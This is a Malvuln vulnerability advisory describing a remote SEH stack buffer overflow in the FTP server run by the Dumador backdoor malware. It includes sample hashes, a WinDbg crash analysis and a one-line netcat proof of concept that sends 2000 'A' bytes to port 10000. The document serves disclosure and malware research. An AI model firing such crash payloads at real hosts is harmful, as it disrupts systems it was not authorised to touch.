Backdoor.Win32.Dumador.c MVID-2024-0679 Buffer Overflow

`Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024  
Original source: https://malvuln.com/advisory/6cc630843cabf23621375830df474bc5.txt  
Contact: [email protected]  
Media: twitter.com/malvuln  
  
Threat: Backdoor.Win32.Dumador.c  
Vulnerability: Remote Stack Buffer Overflow (SEH)  
Description: The malware runs an FTP server on TCP port 10000. Third-party adversaries who can reach the server can send a specially crafted payload triggering a stack buffer overflow overwriting the Structured Exception Handler (SEH).  
Family: Dumador  
Type: PE32  
MD5: 6cc630843cabf23621375830df474bc5  
SHA256: 634eb7d9f5488b46ac44d784da8d82d98a8d86c1c8ef9a838535d44b8e420ea9  
Vuln ID: MVID-2024-0679  
ASLR: False  
DEP: False  
CFG: False  
Safe SEH: False  
Disclosure: 04/15/2024  
  
Memory Dump:  
(16e0.150): Stack buffer overflow - code c0000409 (first/second chance not available)  
eax=00000000 ebx=00000000 ecx=0401fe41 edx=0401fbf0 esi=00000000 edi=00000002  
eip=775ced3c esp=0401f208 ebp=0401f248 iopl=0 nv up ei pl nz na po nc  
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202  
ntdll!ZwWaitForMultipleObjects+0xc:  
775ced3c c21400 ret 14h  
  
0:002> .ecxr  
eax=0401fec8 ebx=00000000 ecx=0401fe41 edx=0401fbf0 esi=00000410 edi=00000194  
eip=74657c7c esp=0401f8b8 ebp=0401f8e0 iopl=0 nv up ei pl nz na pe nc  
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206  
kernel32!lstrcpyA+0x1c:  
74657c7c 880c16 mov byte ptr [esi+edx],cl ds:002b:04020000=??  
*** WARNING: Unable to verify checksum for Backdoor.Win32.Dumador.c.6cc630843cabf23621375830df474bc5.exe  
*** ERROR: Module load completed but symbols could not be loaded for Backdoor.Win32.Dumador.c.6cc630843cabf23621375830df474bc5.exe  
  
0:002> !analyze -v  
*******************************************************************************  
* *  
* Exception Analysis *  
* *  
*******************************************************************************  
  
  
FAULTING_IP:   
kernel32!lstrcpyA+1c  
74657c7c 880c16 mov byte ptr [esi+edx],cl  
  
EXCEPTION_RECORD: 0401f408 -- (.exr 0x401f408)  
ExceptionAddress: 74657c7c (kernel32!lstrcpyA+0x0000001c)  
ExceptionCode: c0000005 (Access violation)  
ExceptionFlags: 00000008  
NumberParameters: 2  
Parameter[0]: 00000001  
Parameter[1]: 04020000  
Attempt to write to address 04020000  
  
PROCESS_NAME: Backdoor.Win32.Dumador.c.6cc630843cabf23621375830df474bc5.exe  
  
ERROR_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application.  
  
EXCEPTION_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application.  
  
EXCEPTION_PARAMETER1: 00000015  
  
MOD_LIST: <ANALYSIS/>  
  
NTGLOBALFLAG: 0  
  
APPLICATION_VERIFIER_FLAGS: 0  
  
CONTEXT: 0401f458 -- (.cxr 0x401f458)  
eax=0401fec8 ebx=00000000 ecx=0401fe41 edx=0401fbf0 esi=00000410 edi=00000194  
eip=74657c7c esp=0401f8b8 ebp=0401f8e0 iopl=0 nv up ei pl nz na pe nc  
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206  
kernel32!lstrcpyA+0x1c:  
74657c7c 880c16 mov byte ptr [esi+edx],cl ds:002b:04020000=??  
Resetting default scope  
  
WRITE_ADDRESS: 04020000   
  
FOLLOWUP_IP:   
kernel32!lstrcpyA+1c  
74657c7c 880c16 mov byte ptr [esi+edx],cl  
  
STACK_ADDR_RAW_STACK_SYMBOL: 401fa34  
  
ADDITIONAL_DEBUG_TEXT: Followup set based on attribute [Is_ChosenCrashFollowupThread] from Frame:[0] on thread:[PSEUDO_THREAD]  
  
LAST_CONTROL_TRANSFER: from 00401bf3 to 74657c7c  
  
FAULTING_THREAD: ffffffff  
  
DEFAULT_BUCKET_ID: STACKIMMUNE  
  
PRIMARY_PROBLEM_CLASS: STACKIMMUNE  
  
BUGCHECK_STR: APPLICATION_FAULT_STACKIMMUNE_STACK_BUFFER_OVERRUN_MISSING_GSFRAME_EXPLOITABLE  
  
STACK_TEXT:   
00000000 00000000 unknown!backdoor.win32.dumador.c.6cc630843cabf23621375830df474bc5.exe+0x0  
  
  
STACK_COMMAND: .cxr 000000000401F458 ; kb ; ** Pseudo Context ** ; kb  
  
SYMBOL_NAME: unknown!backdoor.win32.dumador.c.6cc630843cabf23621375830df474bc5.exe  
  
FOLLOWUP_NAME: MachineOwner  
  
MODULE_NAME: unknown  
  
IMAGE_NAME: unknown  
  
DEBUG_FLR_IMAGE_TIMESTAMP: 0  
  
FAILURE_BUCKET_ID: STACKIMMUNE_c0000409_unknown!Unloaded  
  
BUCKET_ID: APPLICATION_FAULT_STACKIMMUNE_STACK_BUFFER_OVERRUN_MISSING_GSFRAME_EXPLOITABLE_MISSING_GSFRAME_unknown!backdoor.win32.dumador.c.6cc630843cabf23621375830df474bc5.exe  
  
Followup: MachineOwner  
---------  
  
0:002> !exchain  
0401f2c0: ntdll!_except_handler4+0 (775d6a50)  
CRT scope 0, func: ntdll!RtlReportExceptionHelper+251 (776157ad)  
0401f8d0: kernel32!_except_handler4+0 (7466d450)  
CRT scope 0, filter: kernel32!lstrcpyA+2d (74657c8d)  
func: kernel32!lstrcpyA+40 (74657ca0)  
0401ffcc: 41414141  
Invalid exception stack at 41414141  
  
  
Exploit/PoC:  
python -c "print('A'*2000)" | nc64.exe x.x.x.x 10000  
220 CONNECTED  
ERROR  
ERROR  
ERROR  
  
  
Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).  
`